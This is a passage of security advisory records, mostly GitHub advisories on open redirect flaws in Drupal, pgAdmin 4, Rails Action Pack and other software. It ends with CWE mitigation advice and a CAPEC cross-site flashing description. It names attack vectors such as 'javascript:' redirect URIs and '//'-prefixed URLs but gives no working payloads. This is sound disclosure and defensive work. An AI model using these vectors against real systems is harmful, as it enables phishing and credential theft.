"id": "GHSA-86j7-9j95-vpqj",
"modified": "2026-07-07T20:55:28Z",
"published": "2026-07-07T20:55:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/better-auth/better-auth/security/advisories/GHSA-86j7-9j95-vpqj"
},
{
"type": "PACKAGE",
"url": "https://github.com/better-auth/better-auth"
},
{
"type": "WEB",
"url": "https://github.com/better-auth/better-auth/releases/tag/v1.6.13"
},
{
"type": "WEB",
"url": "https://github.com/better-auth/better-auth/releases/tag/v1.7.0-beta.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Better Auth has stored XSS in the auth-server origin via javascript: redirect_uri in oidc-provider and mcp"
}
GHSA-86RQ-J7QH-JCCC
Vulnerability from github – Published: 2022-05-17 00:51 – Updated: 2022-05-17 00:51Open redirect vulnerability in URL-related API functions in Drupal 6.x before 6.35 and 7.x before 7.35 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via vectors involving the "//" initial sequence.
{
"affected": [],
"aliases": [
"CVE-2015-2750"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-09-13T16:29:00Z",
"severity": "MODERATE"
},
"details": "Open redirect vulnerability in URL-related API functions in Drupal 6.x before 6.35 and 7.x before 7.35 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via vectors involving the \"//\" initial sequence.",
"id": "GHSA-86rq-j7qh-jccc",
"modified": "2022-05-17T00:51:58Z",
"published": "2022-05-17T00:51:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2750"
},
{
"type": "WEB",
"url": "https://www.drupal.org/SA-CORE-2015-001"
},
{
"type": "WEB",
"url": "http://cgit.drupalcode.org/drupal/commit/includes/common.inc?h=7.x\u0026id=b44056d2f8e8c71d35c85ec5c2fb8f7c8a02d8a8"
},
{
"type": "WEB",
"url": "http://cgit.drupalcode.org/drupal/commit/includes/menu.inc?h=6.x\u0026id=8ffc5db3c0ab926f3d4b2cf8bc51714c8c0f3c93"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2015/dsa-3200"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2015/03/26/4"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/73219"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-873W-8CPH-RGHJ
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32An open redirect vulnerability exists in binary-husky/gpt_academic version 3.83. The vulnerability occurs when a user is redirected to a URL specified by user-controlled input in the 'file' parameter without proper validation or sanitization. This can be exploited by attackers to conduct phishing attacks, distribute malware, and steal user credentials.
{
"affected": [],
"aliases": [
"CVE-2024-10812"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-20T10:15:19Z",
"severity": "MODERATE"
},
"details": "An open redirect vulnerability exists in binary-husky/gpt_academic version 3.83. The vulnerability occurs when a user is redirected to a URL specified by user-controlled input in the \u0027file\u0027 parameter without proper validation or sanitization. This can be exploited by attackers to conduct phishing attacks, distribute malware, and steal user credentials.",
"id": "GHSA-873w-8cph-rghj",
"modified": "2025-03-20T12:32:40Z",
"published": "2025-03-20T12:32:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10812"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/51408ebd-e0be-489d-8088-f210087dbd6a"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-87FP-VPX2-6V83
Vulnerability from github – Published: 2024-07-15 06:30 – Updated: 2024-07-16 18:31The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
{
"affected": [],
"aliases": [
"CVE-2024-6289"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-15T06:15:02Z",
"severity": "MODERATE"
},
"details": "The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.",
"id": "GHSA-87fp-vpx2-6v83",
"modified": "2024-07-16T18:31:42Z",
"published": "2024-07-15T06:30:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6289"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-883Q-9J5H-3X3G
Vulnerability from github – Published: 2026-05-26 13:30 – Updated: 2026-05-26 13:30Dell PowerFlex Manager, versions 4.6.2 and prior, contains an Open Redirect Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability, leading to a targeted application user being redirected to arbitrary web URLs. The vulnerability could be leveraged by attackers to conduct phishing attacks that cause users to divulge sensitive information.
{
"affected": [],
"aliases": [
"CVE-2025-26483"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-22T14:16:24Z",
"severity": "HIGH"
},
"details": "Dell PowerFlex Manager, versions 4.6.2 and prior, contains an Open Redirect Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability, leading to a targeted application user being redirected to arbitrary web URLs. The vulnerability could be leveraged by attackers to conduct phishing attacks that cause users to divulge sensitive information.",
"id": "GHSA-883q-9j5h-3x3g",
"modified": "2026-05-26T13:30:16Z",
"published": "2026-05-26T13:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26483"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8877-PRQ4-9XFW
Vulnerability from github – Published: 2021-03-02 03:44 – Updated: 2023-07-03 22:06The Host Authorization middleware in Action Pack before 6.1.2.1, 6.0.3.5 suffers from an open redirect vulnerability. Specially crafted Host headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.0.3.4"
},
"package": {
"ecosystem": "RubyGems",
"name": "actionpack"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.0.3.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.1.2.0"
},
"package": {
"ecosystem": "RubyGems",
"name": "actionpack"
},
"ranges": [
{
"events": [
{
"introduced": "6.1.0"
},
{
"fixed": "6.1.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-22881"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2021-03-02T03:44:04Z",
"nvd_published_at": "2021-02-11T18:15:00Z",
"severity": "MODERATE"
},
"details": "The Host Authorization middleware in Action Pack before 6.1.2.1, 6.0.3.5 suffers from an open redirect vulnerability. Specially crafted `Host` headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. ",
"id": "GHSA-8877-prq4-9xfw",
"modified": "2023-07-03T22:06:02Z",
"published": "2021-03-02T03:44:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22881"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/commit/b5de7b3a4787d8a55aaad39f477c16e3af65e444"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1047447"
},
{
"type": "WEB",
"url": "https://benjamin-bouchet.com/cve-2021-22881-faille-de-securite-dans-le-middleware-hostauthorization"
},
{
"type": "WEB",
"url": "https://discuss.rubyonrails.org/t/cve-2021-22881-possible-open-redirect-in-host-authorization-middleware/77130"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/blob/v6.1.2.1/actionpack/CHANGELOG.md"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-22881.yml"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/rubyonrails-security/c/zN_3qA26l6E"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XQ3NS4IBYE2I3MVMGAHFZBZBIZGHXHT3"
},
{
"type": "WEB",
"url": "https://rubygems.org/gems/actionpack"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/05/05/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/08/20/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Actionpack Open Redirect Vulnerability "
}
GHSA-894C-RG7F-3C62
Vulnerability from github – Published: 2023-01-17 12:30 – Updated: 2025-03-17 21:33Open redirect vulnerability in pgAdmin 4 versions prior to v6.14 allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pgadmin4"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-22298"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-20T23:17:38Z",
"nvd_published_at": "2023-01-17T10:15:00Z",
"severity": "MODERATE"
},
"details": "Open redirect vulnerability in pgAdmin 4 versions prior to v6.14 allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.",
"id": "GHSA-894c-rg7f-3c62",
"modified": "2025-03-17T21:33:06Z",
"published": "2023-01-17T12:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22298"
},
{
"type": "WEB",
"url": "https://github.com/pgadmin-org/pgadmin4/issues/5343"
},
{
"type": "PACKAGE",
"url": "https://github.com/pgadmin-org/pgadmin4"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN03832974/index.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHY2B25YHIIFQ3G44TR7NNEST7FJGJPH"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHY2B25YHIIFQ3G44TR7NNEST7FJGJPH"
},
{
"type": "WEB",
"url": "https://www.pgadmin.org"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "pgAdmin 4 Open Redirect vulnerability"
}
GHSA-896V-MQ35-7WX7
Vulnerability from github – Published: 2024-08-26 15:31 – Updated: 2026-01-26 15:30There is an Open Redirect vulnerability in Gnuboard v6.0.4 and below via the url parameter in login path.
{
"affected": [],
"aliases": [
"CVE-2024-39097"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-26T15:15:08Z",
"severity": "MODERATE"
},
"details": "There is an Open Redirect vulnerability in Gnuboard v6.0.4 and below via the `url` parameter in login path.",
"id": "GHSA-896v-mq35-7wx7",
"modified": "2026-01-26T15:30:29Z",
"published": "2024-08-26T15:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39097"
},
{
"type": "WEB",
"url": "https://github.com/gnuboard/g6/issues/557"
},
{
"type": "WEB",
"url": "https://github.com/gnuboard/g6/issues/582"
},
{
"type": "WEB",
"url": "https://github.com/gnuboard/g6/commit/eb52096f8328a891879066400f4599d1153d8bf2"
},
{
"type": "WEB",
"url": "https://gist.github.com/Letm3through/1c7a422aa93b587fe63254e06b7f2977"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- Use a list of approved URLs or domains to be used for redirection.
Mitigation
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page.
Mitigation MIT-21.2
Strategy: Enforcement by Conversion
- When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
- For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Mitigation
Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330).
Mitigation MIT-6
Strategy: Attack Surface Reduction
- Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
- Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-178: Cross-Site Flashing
An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.